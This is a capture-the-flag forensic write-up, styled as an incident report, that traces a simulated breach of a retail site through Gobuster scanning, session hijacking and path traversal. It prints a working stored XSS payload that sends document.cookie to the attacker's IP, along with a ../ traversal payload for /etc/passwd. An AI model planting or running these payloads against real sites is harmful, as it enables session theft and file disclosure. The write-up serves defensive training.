Incident Response Report: RetailBreach — Stored XSS, Session Hijacking & Path Traversal on ShopSphere
Platform: CyberDefenders
Challenge: RetailBreach
Category: Network Forensics / Incident Response
Difficulty: Easy
Classification: Confidential
Tools: Wireshark, NetworkMiner, CyberChef
Achievement: Proof of Completion
1. Executive Summary
Incident Type: Web Server Compromise / Stored XSS / Session Hijacking / Path Traversal
Analyst: Lead SOC Analyst / Threat Hunter
ShopSphere, a prominent online retail platform, began experiencing unusual administrative login activity during late-night hours. These logins coincided with an influx of customer complaints about unexplained account anomalies. A network capture (RetailBreach.pcap) was analyzed to determine the nature, source, and full scope of the breach.
The investigation revealed that an external threat actor (111.224.180.128) systematically compromised the platform through a multi-phase attack. The attacker first performed directory brute-forcing with Gobuster, then injected a Stored XSS payload into the reviews form to steal the admin’s session cookie. Using the stolen session token, the attacker impersonated the admin and exploited a Local File Inclusion vulnerability in log_viewer.php to read /etc/passwd via path traversal.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Attacker IP | 111.224.180.128 | External threat actor IP. |
| Victim IP | 73.124.17.52 | ShopSphere Web Server. |
| Admin IP | 135.143.142.5 | Legitimate admin user. |
| XSS Payload | <script>fetch(...)document.cookie</script> | Stored XSS injected via reviews form. |
| Stolen Token | lqkctf24s9h9lg67teu8uevn3q | Admin PHPSESSID hijacked via XSS. |
| Vulnerable Script | log_viewer.php | PHP script exploited for Local File Inclusion. |
| Attack Tools | gobuster/3.6 | Directory brute-forcing tool. |
MITRE ATT&CK Mapping Overview
| Tactic | Technique | ID |
|---|---|---|
| Reconnaissance | Active Scanning | T1595 |
| Discovery | File and Directory Discovery | T1083 |
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | JavaScript | T1059.007 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Lateral Movement | Use Alternate Authentication Material | T1550 |
| Collection | Data from Local System | T1005 |
2. Phase 1: Initial Triage & Attacker Identification
Objective: Establish a high-level picture of the capture and isolate the threat actor’s IP.
Protocol Hierarchy Analysis
Opening Statistics → Protocol Hierarchy revealed key characteristics of the captured traffic:
- 63.5% HTTP — almost entirely a web-based attack
- 16.4% SSH — noted for further investigation
- Only 3 HTML Form URL-encoded submissions — highly targeted POST requests
IPv4 Conversations & Traffic Volume Analysis
Opening Statistics → Conversations → IPv4 revealed two conversations with the server:
| IP Address | Role | Packets |
|---|---|---|
73.124.17.52 | ShopSphere Server (victim) | 14,696 |
111.224.180.128 | Attacker | 14,517 |
135.143.142.5 | Admin / Legitimate User | 179 |
The dramatic volume difference immediately flagged the attacker. A legitimate user generates tens of requests; this IP generated over 14,000 — consistent with automated tooling, not human browsing behavior.
Endpoint Analysis
The Endpoints tab confirmed the three participants and their traffic volumes:
MITRE ATT&CK Reference:
The overwhelming request volume from111.224.180.128maps to T1595 — Active Scanning. The traffic pattern is consistent with automated tooling, not human browsing behavior.
3. Phase 2: Reconnaissance — Directory Brute-Forcing
Objective: Identify the attacker’s reconnaissance methodology and initial foothold.
Gobuster Directory Enumeration
Following an HTTP stream from the attacker’s high-volume requests revealed the tool’s identity immediately via the User-Agent header:
1
2
3
4
GET /.perf HTTP/1.1
Host: shopsphere.com
User-Agent: gobuster/3.6
Accept-Encoding: gzip
A real browser would identify itself as Mozilla or Chrome. gobuster/3.6 is an unambiguous tool signature.
Target Wordlist Analysis
The requests revealed Gobuster was using a wordlist targeting sensitive Linux dotfiles and configuration paths:
1
2
3
4
5
6
7
8
9
/.git/HEAD
/.cache
/.history
/.htaccess
/.bash_history
/.passwd
/.mysql_history
/.htpasswd
/.bashrc
These are all files that could expose credentials, shell history, or application configuration.
MITRE ATT&CK Reference:
This reconnaissance maps to T1083 — File and Directory Discovery. The attacker systematically enumerated hidden files and directories to identify attack surfaces.
4. Phase 3: Execution — Stored XSS Injection
Objective: Analyze the XSS payload and understand the cookie theft mechanism.
Identifying the Malicious POST Requests
Filtering for POST requests from the attacker revealed two submissions to reviews.php:
1
http.request.method == "POST" && ip.src == 111.224.180.128
XSS Payload Analysis
Following the HTTP stream of the second POST (packet 10058, timestamp ~12:08:47 UTC) exposed the payload in URL-encoded form. Decoding with CyberChef (URL Decode) yielded:
1
<script>fetch('http://111.224.180.128/'+document.cookie);</script>
Payload breakdown:
| Component | Purpose |
|---|---|
<script>...</script> | Tells the browser to execute the contents as JavaScript |
fetch('http://...') | Makes an outbound HTTP request from the victim’s browser |
'http://111.224.180.128/' | The attacker’s listening server — the destination for stolen data |
+ document.cookie | Appends all cookies for the current site to the URL |
When executed, the victim’s browser sends a request like:
1
2
GET /PHPSESSID=lqkctf24s9h9lg67teu8uevn3q HTTP/1.1
Host: 111.224.180.128
Analyst Note:
This is Stored XSS (not Reflected). The payload was submitted via the reviews form and saved to the database. Every user who visited the reviews page would trigger it — including the admin. This persistence is what makes it dangerous.
MITRE ATT&CK Reference:
This attack leverages T1059.007 — JavaScript (injecting malicious script into the reviews form) and T1190 — Exploit Public-Facing Application (exploiting the lack of input sanitization).
5. Phase 4: Credential Access — Session Token Theft
Objective: Determine when the admin’s session was compromised and confirm the stolen token.
Admin Visit Timeline
Filtering for GET requests to any URL containing “reviews” revealed the critical timing:
1
http.request.method == "GET" && http.request.uri contains "reviews"
| Packet | Time | Source | Notes |
|---|---|---|---|
| 61 | 11:xx UTC | 135.143.142.5 | Admin visits reviews — before payload injected. Safe. |
| 10106 | 12:09 UTC | 135.143.142.5 | Admin visits reviews — after payload injected at 12:08. Script fires. |
The 72-second gap between XSS injection (12:08:47 UTC) and the admin’s visit (12:09 UTC) is the window in which the admin’s session was compromised.
Session Token Verification via NetworkMiner
NetworkMiner was loaded with the pcap and the Credentials tab (with “Show Cookies” enabled) surfaced the complete session history:
| Client | Time (UTC) | Credential | Notes |
|---|---|---|---|
135.143.142.5 | 11:50 | PHPSESSID=lqkctf24s9h9lg67teu8uevn3q | Admin’s legitimate session established |
135.143.142.5 | 11:52 | admin / password123 | ⚠️ Admin credentials in plaintext (HTTP) |
111.224.180.128 | 12:00 | PHPSESSID=rprah510186vkkdnfhpe11ea4l | Attacker’s own session during recon |
111.224.180.128 | 12:11 | PHPSESSID=lqkctf24s9h9lg67teu8uevn3q | ✅ Attacker using stolen admin token |
The stolen token lqkctf24s9h9lg67teu8uevn3q was confirmed when it appeared in the attacker’s HTTP requests at 12:11 — 2 minutes after the admin visited the poisoned reviews page.
Analyst Note:
NetworkMiner exposed the admin’s credentials (admin / password123) transmitted in plaintext over HTTP. The absence of HTTPS means an attacker with network access could have credential-sniffed without even needing XSS. This represents a separate, critical vulnerability.
Attacker Using Stolen Session
The attacker was observed using the stolen PHPSESSID cookie in HTTP requests to access admin functionality:
HTTP responses flowing back to the attacker’s IP confirmed the session hijacking was successful:
MITRE ATT&CK Reference:
This phase maps to T1539 — Steal Web Session Cookie (XSS-based cookie theft) and T1550 — Use Alternate Authentication Material (attacker reusing the stolen session from a different IP).
6. Phase 5: Discovery & Actions on Objectives — Path Traversal
Objective: Identify the exploited script and the final data exfiltration payload.
HTTP Request Statistics
Using Statistics → HTTP → Requests in Wireshark provided a full inventory of every URL accessed during the capture. Two admin scripts stood out immediately:
1
2
3
4
/admin/dashboard.php
/admin/log_viewer.php
/admin/log_viewer.php?file=error.log ← file parameter is a red flag
/admin/review_manager.php
The ?file= parameter on log_viewer.php is a textbook Local File Inclusion (LFI) vulnerability. A script that accepts a filename as user input and reads it from disk, without sanitization, allows an attacker to read any file the web server process has access to.
Path Traversal Exploitation
The same HTTP Requests statistics view revealed the final payload:
1
/admin/log_viewer.php?file=../../../../../etc/passwd
How path traversal works:
The web application lives somewhere on the filesystem (e.g., /var/www/html/admin/). Each ../ navigates one directory level up:
1
2
3
4
5
/var/www/html/admin/ → ../
/var/www/html/ → ../../
/var/www/ → ../../../
/var/ → ../../../../
/ → ../../../../../
After climbing 5 levels to the filesystem root /, the payload appends etc/passwd — the Linux file containing all system user account information.
MITRE ATT&CK Reference:
This phase maps to T1083 — File and Directory Discovery (accessing the log viewer) and T1005 — Data from Local System (reading/etc/passwdvia path traversal).
7. Full Attack Timeline
Based on packet timestamps and tool transitions, the complete attack was reconstructed:
| Time (UTC) | Kill Chain Phase | Activity |
|---|---|---|
| 11:50 | — | Admin logs into ShopSphere, session token issued |
| 11:52 | — | Admin credentials transmitted in plaintext (HTTP) |
| 12:00 | Reconnaissance | Attacker begins session, Gobuster scan starts |
| 12:01 | Discovery | Gobuster brute-forces directories, finds admin scripts |
| 12:08 | Execution | Attacker injects XSS payload into reviews form |
| 12:09 | Credential Access | Admin visits reviews page — XSS fires, cookie stolen |
| 12:11 | Lateral Movement | Attacker uses stolen session token, impersonates admin |
| 12:11 | Discovery | Attacker accesses log_viewer.php?file=error.log (test) |
| 12:11 | Actions on Objectives | Attacker reads /etc/passwd via path traversal |
8. Remediation & Mitigation Recommendations
Based on the findings, the following remediation steps should be prioritized:
Immediate Actions
- Take the web server offline and preserve forensic evidence
- Invalidate all active sessions and force password resets
- Audit all customer accounts for unauthorized access
- Block the attacker’s IP (
111.224.180.128) at the network perimeter
Short-Term Fixes
- Implement HTTPS across all endpoints — Admin credentials and session tokens were transmitted in plaintext. TLS would have prevented credential sniffing entirely.
- Sanitize all user input — prevent Stored XSS — The reviews form accepted raw HTML/JavaScript. Input should be stripped of script tags server-side and HTML-encoded on output.
- Fix the Local File Inclusion in log_viewer.php — Never pass user-supplied filenames directly to file read functions. Use a whitelist of allowed log files or validate against an allowed directory with
realpath().
Long-Term Hardening
- Implement Content Security Policy (CSP) — A strict CSP header would have blocked the
fetch()call to an external domain even if the XSS payload was injected. - Implement session token binding — Bind session tokens to the originating IP address or User-Agent. The attacker reused the token from a different IP — this would have invalidated it immediately.
- Deploy a Web Application Firewall (WAF) — A WAF would have detected both the Gobuster scan pattern and the path traversal payload (
../) and blocked them in real time.
9. Conclusion
The RetailBreach analysis demonstrates a complete, methodical web application compromise spanning multiple kill chain phases. Key findings include:
Reconnaissance: The attacker performed automated directory enumeration using
gobuster/3.6, identifying admin scripts and application structure.Execution: A Stored XSS payload was injected into the reviews form, designed to steal session cookies from any visitor — including the admin.
Credential Access: The admin’s session token (
lqkctf24s9h9lg67teu8uevn3q) was stolen when they visited the poisoned reviews page 72 seconds after the payload was injected.Lateral Movement: The attacker impersonated the admin by reusing the stolen session token from a different IP address.
Data Exfiltration: A Local File Inclusion vulnerability in
log_viewer.phpwas exploited via path traversal to read/etc/passwd.
Key Takeaways for the SOC:
- Input Validation: Implement strict input sanitization and output encoding — Stored XSS remains one of the most impactful client-side vulnerabilities.
- Session Security: Bind sessions to IP/User-Agent, implement short timeouts, and deploy HTTPS to prevent token theft.
- File Inclusion Prevention: Never pass user-supplied filenames to file read functions. Use whitelists and
realpath()validation. - Defense in Depth: Each phase of this attack exploited a separate misconfiguration. Any single fix would have broken the kill chain.
Analysis Date: March 22, 2026
Analyst: El OMARI Zakaria